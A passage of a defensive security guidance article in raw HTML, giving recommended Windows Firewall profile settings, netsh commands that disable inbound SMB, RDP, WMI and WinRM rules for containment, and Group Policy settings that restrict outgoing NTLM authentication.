middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Yes</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">%systemroot%\system32\LogFiles\Firewall\pfirewall.log</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">4,096</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Private</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">On</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Block All Connections</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Yes</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Yes</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">%systemroot%\system32\LogFiles\Firewall\pfirewall.log</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">4,096</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Public</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">On</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Block All Connections</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Yes</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Yes</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">%systemroot%\system32\LogFiles\Firewall\pfirewall.log</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">4,096</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 11: Windows Firewall recommended configuration state</span></div></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--medium h-c-grid__col h-c-grid__col--4 h-c-grid__col--offset-4 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig6.max-1000x1000.png" alt="Windows Firewall Recommendation Configurations"> </a> <figcaption class="article-image__caption "><p data-block-key="2sb2o">Figure 6: Windows Firewall recommendation configurations</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Additionally, to ensure that only centrally managed firewall rules are enforced (and cannot be overridden by a threat actor), the settings for </span><span style="font-style: italic; vertical-align: baseline;">Apply local firewall rules</span><span style="vertical-align: baseline;"> and </span><span style="font-style: italic; vertical-align: baseline;">Apply local connection security rules</span><span style="vertical-align: baseline;"> can be set to </span><span style="font-style: italic; vertical-align: baseline;">No</span><span style="vertical-align: baseline;"> for all profiles.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--medium h-c-grid__col h-c-grid__col--4 h-c-grid__col--offset-4 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig7.max-1000x1000.png" alt="Windows Firewall Domain Profile Customized Settings"> </a> <figcaption class="article-image__caption "><p data-block-key="2sb2o">Figure 7: Windows Firewall domain profile customized settings</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">To quickly contain and isolate systems, the centralized Windows Firewall setting of </span><span style="font-style: italic; vertical-align: baseline;">Block all connections</span><span style="vertical-align: baseline;"> (Figure 8) will prevent any inbound connections from being established to a system. This is a setting that can be enforced on workstations and laptops, but will likely impact operations if enforced for servers, although if there is evidence of an active threat actor lateral pivoting within an environment, it may be a necessary step for rapid containment.</span></p> <p><strong style="vertical-align: baseline;">Note:</strong><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">If this control is being used temporarily to facilitate containment as part of an active incident, once the incident has been contained and it has been deemed safe to re-establish connectivity among systems within an environment, the </span><span style="font-style: italic; vertical-align: baseline;">Inbound Connections</span><span style="vertical-align: baseline;"> setting can be changed back to </span><span style="font-style: italic; vertical-align: baseline;">Allow</span><span style="vertical-align: baseline;"> using a GPO.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--medium h-c-grid__col h-c-grid__col--4 h-c-grid__col--offset-4 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig8.max-1000x1000.png" alt="Windows Firewall - Block All Connections Settings"> </a> <figcaption class="article-image__caption "><p data-block-key="2sb2o">Figure 8: Windows Firewall - Block All Connections settings</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">If blocking all inbound connectivity for endpoints during a containment event is not practical, or for the </span><span style="font-style: italic; vertical-align: baseline;">Domain</span><span style="vertical-align: baseline;"> profile configurations, at a minimum, the protocols listed in Table 12 should be enforced using either a GPO or via the commands referenced within the table.</span></p></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><span style="vertical-align: baseline;">For any specific applications that may require inbound connectivity to end-user endpoints, the local firewall policy should be configured with specific IP address exceptions for origination systems that are authorized to initiate inbound connections to such devices.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Protocol/Port</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Windows Firewall Rule</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Command Line Enforcement</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p role="presentation"><span style="vertical-align: baseline;">SMB</span></p> <p><span style="vertical-align: baseline;">TCP/445, TCP/139, TCP/135</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p role="presentation"><span style="vertical-align: baseline;">Predefined Rule Name:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">File and Print Sharing</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Remote Desktop</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Windows Management Instrumentation (WMI)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Windows Remote Management</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Windows Remote Management (Compatibility)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">TCP/5986</span></p> </li> </ul> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=no</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p role="presentation"><span style="vertical-align: baseline;">Remote Desktop Protocol</span></p> <p><span style="vertical-align: baseline;">TCP/3389</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p role="presentation"><span style="vertical-align: baseline;">Predefined Rule Name:</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">netsh advfirewall firewall set rule group="Remote Desktop" new enable=no</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">WMI</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p role="presentation"><span style="vertical-align: baseline;">Predefined Rule Name:</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=no</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p role="presentation"><span style="vertical-align: baseline;">Windows Remote Management/PowerShell Remoting</span></p> <p><span style="vertical-align: baseline;">TCP/80, TCP/5985, TCP/5986</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p role="presentation"><span style="vertical-align: baseline;">Predefined Rule Name:</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p role="presentation"><code style="vertical-align: baseline;">netsh advfirewall firewall set rule group="Windows Remote Management" new enable=no</code></p> <p role="presentation"><span style="vertical-align: baseline;">Via PowerShell:</span></p> <p><code style="vertical-align: baseline;">Disable-PSRemoting -Force</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; margin-top: 8px; width: 100%; font-style: italic;">Table 12: Windows Firewall suggested block rules</span></p> </div> </div></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig9.max-1000x1000.png" alt="Windows Firewall Suggested Rule Blocks via Group Policy"> </a> <figcaption class="article-image__caption "><p data-block-key="ibnn4">Figure 9: Windows Firewall suggested rule blocks via Group Policy</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">NTLM Authentication Configurations</span></h5> <p><span style="vertical-align: baseline;">Threat actors often attempt to harvest credentials (including Windows NTLMv1 hashes) based upon outbound SMB or WebDAV communications. Organizations should review NTLM settings for Windows-based endpoints, and work to harden, disable, or restrict NTLMv1 authentication requests. </span></p> <p><span style="vertical-align: baseline;">To fully restrict NTLM authentication to remote servers, the following GPO settings can be leveraged:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; Security Options &gt; Network Security: Restrict NTLM: Outgoing NTLM traffic to remote servers </span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Allow all</span></p> </li> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Audit all</span></p> </li> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"><span style="font-style: italic; vertical-align: baseline;">Deny all</span></li> </ul> </li> </ul> <p><strong style="vertical-align: baseline;">Note:</strong><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">If "</span><code style="vertical-align: baseline;">Deny all</code><span style="vertical-align: baseline;">" is selected, the client computer cannot authenticate (send credentials) to a remote server using NTLM authentication. Before setting to "</span><code style="vertical-align: baseline;">Deny all,</code><span style="vertical-align: baseline;">" organizations should configure the GPO setting with the "</span><code style="vertical-align: baseline;">Audit all</code><span style="vertical-align: baseline;">" enforcement. With this configuration, audit and block events will be recorded within the Operational event log on endpoints (</span><code style="vertical-align: baseline;">Applications and Services Log\Microsoft\Windows\NTLM</code><span style="vertical-align: baseline;">).</span></p> <p><span style="vertical-align: baseline;">If any recorded NTLM authentication events are required, organizations can configure the "</span><code style="vertical-align: baseline;">Network security: Restrict NTLM: Add remote server exceptions for NTLM authentication</code><span style="vertical-align: baseline;">" setting to define a listing of remote servers, which are required to use NTLM authentication.</span></p> <h4><span style="vertical-align: baseline;">Detection Opportunities for SMB, WMI, and NTLM Communications</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: 